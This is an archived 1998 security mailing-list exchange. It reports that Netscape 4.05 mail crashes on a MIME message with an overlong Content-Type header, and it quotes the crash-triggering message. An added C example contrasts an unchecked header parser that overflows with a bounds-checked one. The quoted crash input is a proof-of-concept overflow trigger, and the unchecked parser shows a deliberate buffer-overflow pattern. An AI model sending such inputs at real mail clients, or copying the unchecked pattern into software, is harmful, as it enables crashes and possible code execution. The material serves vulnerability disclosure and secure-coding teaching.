It makes perfect sense that any header field could overflow a limited buffer. I'd assumed that developers would have the sense to check ALL of the buffers used to store headers, but maybe this should be pointed out to them, just to make sure. We may see exploits based on bugs in UUDECODE and BinHex decoders in mailers as well. I'm sure they're there given the overall low quality of the code that these companies are generating (sigh).

--Brett Glass

At 08:21 PM 7/28/98 +0200, Paul Boehm wrote:
>Hi,
>Netscape mail crashes when trying to the attachment
>from the following pseudo MIME mail:
>
>From: Paul Boehm <paulat_private>
>To: paulat_private
>Subject: test
>Mime-Version: 1.0
>Content-Type: AAAAAAAAAAAAAAAAAAAAAA...; boundary=ABC123
>--ABC123
>Content-Type: text/plain; charset=us-ascii
>
>test123
>
>--ABC123
>Content-Type: application/octet-stream
>Content-Transfer-Encoding: base64
>Content-Disposition: attachment; filename="AA"
>
>H4sIAA7jvDUAA+3OOQ6EQBBD0Y45hY9QJejiPI1EBhJiuT+LiEeaAEj+SxzYgdfR09PcLMyU
>JLURdzZX3hopcm49vD6Ks/acZI8/O2zLWmYpTWUbfu/6+Y0/L+uGUn39AQAAAAAAAAAAAAAA
>AADwvx2CTC7aACgAAA==
>
>--ABC--
>
>I suppose this is exploitable, but I don't really know.
>I only tested this with Win95 Netscape 4.05.
>
>bye,
> paul
>
>--
>
>[ Paul S. Boehm | paulat_private | http://paul.boehm.org/ | infected@irc ]
>
>Money is what gives a programmer his resources. It's an exchange system created
>by human beings. It surrounds us. Works for us, binds the economy together.
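The point in the reply above is that every fixed-size buffer a mailer fills from a header needs its own length check, not just the ones for headers someone happened to think of. The C below is an added illustration written for this archive page; it is not Netscape code and not code from either poster. It assumes a 64-byte per-field buffer (FIELD_MAX, an assumption: the real size in Netscape 4.05 is not known from the post) and a constructed Content-Type value modelled on the one in the report, a long run of 'A's followed by "; boundary=ABC123". It shows the unchecked copy pattern that such a header can overflow, and beside it a parser in which every copy into a fixed buffer goes through one bounded helper and an oversize field is rejected rather than truncated.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumed size of a mailer's per-field header buffer (not taken from the post). */
#define FIELD_MAX 64

struct content_type {
    char media_type[FIELD_MAX];   /* e.g. "multipart/mixed" */
    char boundary[FIELD_MAX];     /* "" when no boundary parameter is present */
};

/* The unchecked pattern the reply warns about: tokens copied into fixed buffers
   with no length test. Fed a media type of FIELD_MAX or more bytes it writes past
   media_type. Kept for contrast; main() only calls it on a short value. */
void parse_content_type_unchecked(const char *value, struct content_type *ct)
{
    const char *semi = strchr(value, ';');
    size_t n = semi ? (size_t)(semi - value) : strlen(value);
    memcpy(ct->media_type, value, n);        /* n is never compared to FIELD_MAX */
    ct->media_type[n] = '\0';
    const char *b = semi ? strstr(semi, "boundary=") : NULL;
    if (b) strcpy(ct->boundary, b + 9);      /* same problem for the boundary */
    else ct->boundary[0] = '\0';
}

/* Copy n bytes into dst[cap] and terminate; refuse instead of overflowing. */
static int copy_bounded(char *dst, size_t cap, const char *src, size_t n)
{
    if (n >= cap) return -1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return 0;
}

/* Shrink [*p, *end) to drop surrounding whitespace. */
static void trim(const char **p, const char **end)
{
    while (*p < *end && isspace((unsigned char)**p)) (*p)++;
    while (*end > *p && isspace((unsigned char)(*end)[-1])) (*end)--;
}

/* Case-insensitive test for the parameter name "boundary". */
static int is_boundary_name(const char *s, size_t n)
{
    const char *k = "boundary";
    if (n != strlen(k)) return 0;
    for (size_t i = 0; i < n; i++)
        if (tolower((unsigned char)s[i]) != k[i]) return 0;
    return 1;
}

/* Checked parser for "type/subtype; param=value; ...". Returns 0 on success,
   -1 if any field would not fit its buffer (reject the message, do not truncate
   silently), -2 if the media type is empty. */
int parse_content_type(const char *value, struct content_type *ct)
{
    const char *p = value, *end = value + strlen(value);
    const char *semi = memchr(p, ';', (size_t)(end - p));
    const char *tstart = p, *tend = semi ? semi : end;

    trim(&tstart, &tend);
    if (tstart == tend) return -2;
    if (copy_bounded(ct->media_type, sizeof ct->media_type, tstart, (size_t)(tend - tstart)) < 0)
        return -1;

    ct->boundary[0] = '\0';
    p = semi ? semi + 1 : end;
    while (p < end) {                         /* walk the ';'-separated parameters */
        const char *next = memchr(p, ';', (size_t)(end - p));
        const char *pstart = p, *pend = next ? next : end;
        const char *eq;

        trim(&pstart, &pend);
        eq = memchr(pstart, '=', (size_t)(pend - pstart));
        if (eq) {
            const char *nstart = pstart, *nend = eq;
            const char *vstart = eq + 1, *vend = pend;
            trim(&nstart, &nend);
            trim(&vstart, &vend);
            if (vend - vstart >= 2 && *vstart == '"' && vend[-1] == '"') { vstart++; vend--; }
            if (is_boundary_name(nstart, (size_t)(nend - nstart)) &&
                copy_bounded(ct->boundary, sizeof ct->boundary, vstart, (size_t)(vend - vstart)) < 0)
                return -1;
        }
        p = next ? next + 1 : end;
    }
    return 0;
}

/* Constructed input modelled on the post: n 'A's as the media type, then
   "; boundary=ABC123". Returns -1 if buf cannot hold it. */
int build_sample_value(char *buf, size_t cap, size_t n)
{
    const char *tail = "; boundary=ABC123";
    if (n + strlen(tail) + 1 > cap) return -1;
    memset(buf, 'A', n);
    memcpy(buf + n, tail, strlen(tail) + 1);
    return 0;
}

int main(void)
{
    struct content_type ct;
    char value[1024];

    parse_content_type_unchecked("multipart/mixed; boundary=ABC123", &ct);
    printf("unchecked, short value: type=%s boundary=%s\n", ct.media_type, ct.boundary);

    build_sample_value(value, sizeof value, 500);
    printf("checked, 500-byte type: rc=%d (-1 = would overflow, message rejected)\n",
           parse_content_type(value, &ct));
    return 0;
}
```

Build with `cc -std=c99 -Wall` and run. The checked parser returns -1 for the 500-byte media type and also for an oversize boundary, which is the second buffer the reply is pointing at; calling parse_content_type_unchecked on the same 500-byte value instead overruns media_type, which is the class of bug the reported crash suggests.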
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:09:38 PDT